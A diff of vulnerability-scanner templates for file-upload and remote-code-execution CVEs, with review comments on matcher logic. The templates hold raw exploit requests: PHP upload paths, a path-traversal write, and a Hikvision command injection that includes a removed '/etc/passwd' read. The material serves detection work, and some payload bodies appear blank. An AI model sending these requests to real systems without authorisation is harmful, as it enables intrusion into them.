diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml
index 049664ecc2..aa761fc5f5 100644
--- a/http/cnvd/2021/CNVD-2021-49104.yaml
+++ b/http/cnvd/2021/CNVD-2021-49104.yaml
@@ -17,6 +17,9 @@ info:
max-request: 2
tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
+variables:
+ string: "{{randstr}}"
+
http:
- raw:
- |
@@ -28,7 +31,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
-
+
--e64bdf16c554bbc109cecef6451c26a4--
- |
@@ -37,6 +40,10 @@ http:
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(string)}}'
- type: word
part: body
words:
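Review bot: The new md5 matcher at L24-L27 uses `part: body` with no response index, although this template sends two requests (`max-request: 2`) and the marker can only appear in the response to the second one; the same commit pins `part: body_2` in CVE-2017-6090 and CVE-2021-40870, so `part: body_2` here would be both more precise and consistent. `string: "{{randstr}}"` at L9 is the same value used as the uploaded filename at L15, so the marker is tied to the file this run created, which is the right design. The matcher list continues below the hunk.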
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index f27d31a96a..7649d2b702 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -30,6 +30,9 @@ info:
product: php
tags: cve,cve2012,kev,vulhub,rce,php
+variables:
+ string: "CVE-2012-1823"
+
http:
- raw:
- |
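Review bot: `string: "CVE-2012-1823"` turns `{{md5(string)}}` into a constant hex that anyone who has read the template can precompute, so a honeypot or a WAF canned page can satisfy the matcher without any PHP executing; CNVD-2021-49104 and CVE-2021-36260 in this same commit use a random per-run value, which cannot be replayed that way. If the static id is deliberate (a deterministic matched line for reporting), a one-line comment such as `# static marker: md5 of the template id, deliberately constant` would stop the next maintainer from changing it either way. The request body at L47-L48 does not show the PHP payload in this view, so I cannot confirm it echoes md5 of exactly this string.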
@@ -37,16 +40,13 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "3d638155445bffb044eec401381ad784"
+ - '{{md5(string)}}'
- - type: status
- status:
- - 200
# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index 3c12870fda..aeaf623907 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -28,6 +28,9 @@ info:
shodan-query: http.title:"PhpCollab"
tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
+variables:
+ string: "CVE-2017-6090"
+
http:
- raw:
- |
@@ -39,7 +42,7 @@ http:
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
-
+
-----------------------------154934846911423734231554128137--
- |
@@ -49,9 +52,9 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "48dbd2384cb6b996fa1e2855c7f0567f"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml
index c521f6727c..54e72b5634 100644
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -27,6 +27,9 @@ info:
product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
+variables:
+ string: "CVE-2017-9841"
+
http:
- raw:
- |
@@ -34,44 +37,44 @@ http:
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "6dd70f16549456495373a337e6708865"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml
index c8d8d0c2d1..a5447efae9 100644
--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -29,6 +29,9 @@ info:
product: monitorr
tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
+variables:
+ string: "CVE-2020-28871"
+
http:
- raw:
- |
@@ -47,7 +50,7 @@ http:
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
- GIF89a213213123
+ GIF89a213213123
-----------------------------31046105003900160576454225745--
- |
@@ -59,7 +62,7 @@ http:
- type: word
part: body_2
words:
- - "d03c180355b797069cc047ff5606d689"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml
index ef3a669263..500d2250f0 100644
--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
+variables:
+ string: "CVE-2021-24145"
+
http:
- raw:
- |
@@ -48,7 +51,7 @@ http:
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
Content-Type: text/csv
-
+
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="mec-ix-action"
@@ -61,10 +64,8 @@ http:
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_3, 'CVE-2021-24145')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml
index d670c0c1cb..3b716eb4ac 100644
--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -1,4 +1,4 @@
-id: "CVE-2021-24236"
+id: CVE-2021-24236
info:
name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
@@ -29,9 +29,11 @@ info:
product: imagements
framework: wordpress
tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
+
variables:
php: "{{to_lower('{{randstr}}')}}.php"
post: "1"
+ string: "CVE-2021-24236"
http:
- raw:
@@ -68,7 +70,7 @@ http:
Content-Disposition: form-data; name="image"; filename="{{php}}"
Content-Type: image/jpeg
-
+
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="submit"
@@ -91,5 +93,6 @@ http:
- type: word
part: body_2
words:
- - "CVE-2021-24236"
+ - '{{md5(string)}}'
+
# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml
index 6c0d968b2d..b43a5c4148 100644
--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -31,10 +31,12 @@ info:
product: kaswara
framework: wordpress
tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
+
variables:
zip_file: "{{to_lower(rand_text_alpha(6))}}"
php_file: "{{to_lower(rand_text_alpha(2))}}.php"
- php_cmd: ""
+ string: "CVE-2021-24284"
+ php_cmd: ""
http:
- raw:
@@ -71,7 +73,7 @@ http:
- type: word
part: body_2
words:
- - "phpinfo()"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml
index a77f371ed5..297fbf73b6 100644
--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
+variables:
+ string: "CVE-2021-24499"
+
http:
- raw:
- |
@@ -46,7 +49,7 @@ http:
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php
-
+
-----------------------------cd0dc6bdc00b1cf9--
- |
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
@@ -57,7 +60,7 @@ http:
- type: word
part: body
words:
- - "71abe5077dae2754c36d731cc1534d4d"
+ - '{{md5(string)}}'
- type: status
status:
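Review bot: The matcher at L295-L299 keeps `part: body` with no response index even though the marker is only expected in the response to `GET /wp-content/uploads/workreap-temp/{{randstr}}.php` at L293, the second of two requests; sibling templates in this commit (CVE-2017-6090, CVE-2021-40870, CVE-2022-4328) were switched to `part: body_2`. Suggest `part: body_2` here too. The status matcher at L300-L301 continues below the hunk.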
diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml
index 7ed41ae206..70c378a563 100644
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -30,6 +30,9 @@ info:
shodan-query: http.favicon.hash:999357577
tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
+variables:
+ string: "{{to_lower(rand_base(12))}}"
+
http:
- raw:
- |
@@ -37,15 +40,15 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- $(cat /etc/passwd>webLib/x)
+ $(echo {{string}}>webLib/x)
- |
GET /x HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- - type: regex
- part: body
- regex:
- - "root:.*:0:0:"
+ - type: word
+ part: body_2
+ words:
+ - "{{string}}"
# digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
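Review bot: The injected command at L319 still writes `webLib/x` on the device and nothing in the template removes it, so a file is left behind on every hit even though the template no longer reads /etc/passwd; a comment above the request, e.g. `# writes webLib/x on the target (served back as /x); not cleaned up`, would make that explicit for people relying on the intrusive tag. Replacing the `cat /etc/passwd` read with an `echo {{string}}` marker is the right direction. `matchers-condition: and` at L323 now governs a single matcher and can be dropped.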
diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml
index 3ee7ed2562..b42bf1bf16 100644
--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -29,6 +29,9 @@ info:
product: controller
tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
+variables:
+ string: "CVE-2021-40870"
+
http:
- raw:
- |
@@ -36,7 +39,7 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=
+ CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=
- |
GET /v1/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
@@ -45,8 +48,9 @@ http:
matchers-condition: and
matchers:
- type: word
+ part: body_2
words:
- - '0d95513363fd69b9fee712f333293654'
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml
index f42d8daa3a..8e70fb2c4d 100644
--- a/http/cves/2022/CVE-2022-1952.yaml
+++ b/http/cves/2022/CVE-2022-1952.yaml
@@ -32,6 +32,9 @@ info:
framework: wordpress
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
+variables:
+ string: "CVE-2022-1952"
+
http:
- raw:
- |
@@ -56,7 +59,7 @@ http:
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------98efee55508c5059--
- |
@@ -68,13 +71,10 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_1, 'success\":true')
- - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml
index d24b4dd4cb..b661e227aa 100644
--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -28,7 +28,10 @@ info:
max-request: 2
vendor: thedigitalcraft
product: atomcms
- tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft
+ tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload
+
+variables:
+ string: "CVE-2022-25487"
http:
- raw:
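Review bot: The tag added at L411 is misspelled: `fielupload` will not be selected by the `fileupload` tag filter that every other template in this commit uses. Change it to `...,thedigitalcraft,fileupload`.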
@@ -46,7 +49,7 @@ http:
Content-Type: image/jpeg
-
+
-----------------------------30623082103363803402542706041--
- |
GET /uploads/{(unknown)} HTTP/1.1
@@ -57,16 +60,7 @@ http:
- type: word
part: body
words:
- - 7ee3686858eb89dd68ccf85f0ea03abe
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml
index 6673fdf773..6de5abe469 100644
--- a/http/cves/2022/CVE-2022-3982.yaml
+++ b/http/cves/2022/CVE-2022-3982.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart
+variables:
+ string: "CVE-2022-3982"
+
http:
- raw:
- |
@@ -64,7 +67,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------1cada150a8151a54--
- |
@@ -72,12 +75,10 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
index 437768ea4f..4af25f095d 100644
--- a/http/cves/2022/CVE-2022-4328.yaml
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -25,7 +25,10 @@ info:
vendor: najeebmedia
product: woocommerce_checkout_field_manager
framework: wordpress
- tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia
+ tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload
+
+variables:
+ string: "CVE-2022-4328"
http:
- raw:
@@ -38,7 +41,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------22728be7b3104597--
- |
@@ -48,16 +51,8 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - fe5df26ce4ca0056ffae8854469c282f
+ - '{{md5(string)}}'
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
# digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 946523a074..886f847b73 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -31,9 +31,9 @@ info:
product: jorani
shodan-query: http.favicon.hash:-2032163853
tags: cve2023,cve,jorani,rce,packetstorm
+
variables:
- cmd: "id"
- payload: ""
+ payload: ""
header: "{{to_upper(rand_base(12))}}"
http:
@@ -51,14 +51,14 @@ http:
GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
Host: {{Hostname}}
X-REQUESTED-WITH: XMLHttpRequest
- {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+ {{header}}: CVE-2023-26469
matchers-condition: and
matchers:
- - type: regex
- part: body_3
- regex:
- - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+ - type: word
+ part: body
+ words:
+ - '7cca0844e81cd333152def045fe075c2'
- type: status
part: header_3
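Review bot: The word matcher at L544-L547 hard-codes the hex `7cca0844e81cd333152def045fe075c2` instead of defining `string` and matching `{{md5(string)}}` as every other template in this commit does, and it drops the `_3` index the removed regex had (`part: body`) while the status matcher right below still refers to `header_3`. A status matcher does not use `part`, so `part: header_3` at L549 is ignored as well. Suggest `string: "CVE-2023-26469"` under `variables:`, `part: body_3` with `- '{{md5(string)}}'`, and a DSL `status_code_3 == 200` if the third response's status is what is meant; I cannot verify from here that the literal hex equals md5 of that id, which is one more reason to derive it.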
diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml
index 8d345d1047..44550aa5ad 100644
--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@@ -33,6 +33,7 @@ info:
tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables:
file: '{{rand_base(5, "abc")}}'
+ string: "CVE-2023-2648"
http:
- raw:
@@ -46,7 +47,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
Content-Type: image/jpeg
-
+
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- |
POST /attachment/{{name}}/{{file}}.php HTTP/1.1
@@ -57,7 +58,7 @@ http:
- type: word
part: body_2
words:
- - "747711c62dffae7dbf726d8241bd07fe"
+ - '{{md5(string)}}'
- type: status
part: body_2
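Review bot: The status matcher at L575-L576 carries `part: body_2`, which a status matcher does not consult — it compares the status code of the response being evaluated, so the part is ignored and the line records an intent the matcher cannot honor. If the status of the second request is what matters, a `- type: dsl` matcher with `status_code_2 == 200` expresses it; otherwise remove the `part:` line. The matcher's `status:` list continues below the hunk.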
diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml
index 749d794105..3003904fc3 100644
--- a/http/cves/2023/CVE-2023-33440.yaml
+++ b/http/cves/2023/CVE-2023-33440.yaml
@@ -30,8 +30,10 @@ info:
vendor: faculty_evaluation_system_project
product: faculty_evaluation_system
tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
+
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
+ string: "CVE-2023-33440"
http:
- raw:
@@ -56,7 +58,7 @@ http:
Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
-----------------------------1037163726497
Content-Disposition: form-data; name="email"
diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml
index 84505cd89b..33c84f6147 100644
--- a/http/cves/2023/CVE-2023-35885.yaml
+++ b/http/cves/2023/CVE-2023-35885.yaml
@@ -30,11 +30,12 @@ info:
vendor: mgt-commerce
product: cloudpanel
shodan-query: title:"Cloudpanel"
- tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce
+ tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload
+
variables:
session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
str1: "{{rand_base(10)}}"
- str2: "{{randstr}}"
+ string: "CVE-2023-35885"
http:
- raw:
@@ -55,7 +56,7 @@ http:
Cookie: clp-fm={{session}}
Content-Type: application/x-www-form-urlencoded
- id=/htdocs/app/files/public/{{str1}}.php&content=
+ id=/htdocs/app/files/public/{{str1}}.php&content=
- |
POST /file-manager/backend/permissions HTTP/1.1
Host: {{Hostname}}
@@ -68,7 +69,8 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - body_5 == str2
+ - type: word
+ part: body_5
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a00473045022100a045e62170736a2a8aeec80f23c92eb2dfbb4704e093df2e6fa248efe9b5b13a02205561485b4abcd5c2e85f585adb82c3e1234a7a623a068b389b548de0887da802:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml
index 7b6f67cc0a..11414b79c3 100644
--- a/http/cves/2023/CVE-2023-36844.yaml
+++ b/http/cves/2023/CVE-2023-36844.yaml
@@ -32,8 +32,8 @@ info:
shodan-query: title:"Juniper Web Device Manager"
tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables:
- value: "CVE-2023-36844"
- payload: "('')"
+ string: "CVE-2023-36844"
+ payload: "('')"
http:
- raw:
@@ -65,7 +65,7 @@ http:
- type: word
part: body_3
words:
- - '{{md5(value)}}'
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml
index 4bdfc8b4ea..8703194184 100644
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -28,6 +28,9 @@ info:
product: simple_online_piggery_management_system
tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
+variables:
+ string: "CVE-2023-37629"
+
http:
- raw:
- |
@@ -67,7 +70,7 @@ http:
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
Content-Type: application/x-php
-
+
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="submit"
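Review bot: The Content-Disposition at L672 reads `filename="{{rand_base(5)}}".php"` as rendered here — the closing quote sits before `.php` and a stray quote follows, so the part header is malformed and whether the server stores the file as `<rand>.php` depends on how leniently it parses the header. If that is how the template is written rather than an artifact of this view, it should be `filename="{{rand_base(5)}}.php"`. The rest of the multipart body and the matchers lie outside this hunk.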
diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml
index 71102a69f7..960c41b024 100644
--- a/http/cves/2023/CVE-2023-4596.yaml
+++ b/http/cves/2023/CVE-2023-4596.yaml
@@ -29,6 +29,9 @@ info:
publicwww-query: /wp-content/plugins/Forminator
tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
+variables:
+ string: "CVE-2023-4596"
+
http:
- raw:
- |
@@ -60,7 +63,7 @@ http:
Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
Content-Type: application/x-php
-
+
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="forminator_nonce"
diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml
index 1b175f2c8d..33a57bcdfc 100644
--- a/http/cves/2023/CVE-2023-5360.yaml
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -29,8 +29,10 @@ info:
framework: wordpress
publicwww-query: "/plugins/royal-elementor-addons/"
tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
+
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
+ string: "CVE-2023-5360"
http:
- raw:
@@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
Content-Type: image/png
-
+
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="allowed_file_types"
@@ -69,17 +71,7 @@ http:
- type: word
part: body_3
words:
- - "86398d3a90432d24901a7bbdcf1ab2ba"
- condition: and
-
- - type: word
- part: header_3
- words:
- - "text/html"
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
index 223d60ffcd..9307cb3420 100644
--- a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
+++ b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
@@ -14,6 +14,8 @@ info:
metadata:
max-request: 2
tags: rce,fileupload,intrusive,cloud,chuangtian
+variables:
+ string: "core-chuangtian-cloud-rce"
http:
- raw:
@@ -29,17 +31,16 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/avif
-
+
------WebKitFormBoundaryfcKRltGv--
- |
GET /Upload/test/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
- - 'status_code_2 == 200'
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
index b96448909a..f598b35a0f 100644
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@@ -12,10 +12,11 @@ info:
verified: true
max-request: 2
fofa-query: app="Ruijie-NBR路由器"
- tags: ruijie,file-upload,intrusive,nbr
+ tags: ruijie,fileupload,intrusive,nbr
+
variables:
filename: "{{rand_base(6)}}"
- string: "{{rand_base(5)}}"
+ string: "ruijie-nbr-fileupload"
http:
- raw:
@@ -26,16 +27,15 @@ http:
Content-Disposition: form-data; name="file"; filename="{(unknown)}.php"
Content-Type: image/jpeg
-
+
- |
GET /ddi/server/upload/{(unknown)}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - status_code_1 == 200 && contains(body_1,"jsonrpc")
- - status_code_2 == 200 && contains(body_2,"{{string}}")
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
index 1b72a6aaed..7b0cf9f5ed 100644
--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@@ -16,8 +16,8 @@ info:
tags: secgate,3600,firewall,file-upload,intrusive
variables:
filename: "{{rand_base(6)}}"
- string: "{{randstr}}"
file-upload: "{{rand_base(5)}}"
+ string: "secgate-3600-file-upload"
http:
- raw:
